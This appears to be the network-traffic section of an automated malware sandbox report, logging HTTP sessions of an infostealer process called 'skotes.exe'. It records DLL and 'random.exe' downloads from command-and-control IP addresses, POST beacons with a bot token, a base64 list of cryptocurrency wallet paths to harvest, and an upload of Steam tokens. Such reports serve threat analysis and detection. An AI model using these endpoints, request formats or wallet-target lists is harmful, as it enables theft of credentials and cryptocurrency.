                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:50.822432041 CET91OUTGET /68b591d6548ec281/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:51.266343117 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:51 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                          ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Content-Length: 2046288
                                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:54.362258911 CET95OUTGET /68b591d6548ec281/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:54.809528112 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:54 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                          ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Content-Length: 257872
                                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:55.724052906 CET99OUTGET /68b591d6548ec281/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:56.052622080 CET99OUTGET /68b591d6548ec281/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:56.177953005 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:55 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                          ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Content-Length: 80880
                                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:56.643389940 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----AEBKKECBGIIJJKECGIJE
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Content-Length: 1067
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:57.755656958 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:56 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=90
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:57.923237085 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGID
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Content-Length: 267
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 2d 2d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="message"wallets------JJJKFBAAAFHJEBFIEGID--
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:58.367387056 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:58 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          Content-Length: 2408
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=89
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:58.395664930 CET467OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----AFIDGDBGCAAFIDHIJKEH
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Content-Length: 265
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 2d 2d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: ------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="message"files------AFIDGDBGCAAFIDHIJKEH--
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:58.841140985 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:58 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=88
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:58.858804941 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHI
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Content-Length: 363
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: ------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="file"------HJEHIJEBKEBFBFHIIDHI--
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:00.094763041 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:59 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=87
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:00.218229055 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:59 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=87
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:00.323218107 CET474OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFI
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Content-Length: 272
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: ------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="message"ybncbhylepme------DGDBKFBAKFBFHIECFBFI--
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:00.769488096 CET271INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:00 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Content-Length: 68
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=86
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d
                                                                                                                                                                                                                                                          Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          7192.168.2.449768185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.541574955 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 37 36 32 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                          Data Ascii: d1=1017624001&unit=246122658369
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.888715029 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:42 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          8192.168.2.44977231.41.244.11806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.135709047 CET61OUTGET /files/wicked/random.exe HTTP/1.1
                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.430156946 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:44 GMT
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          Content-Length: 1114112
                                                                                                                                                                                                                                                          Last-Modified: Thu, 19 Dec 2024 03:43:46 GMT
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          ETag: "67639672-110000"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
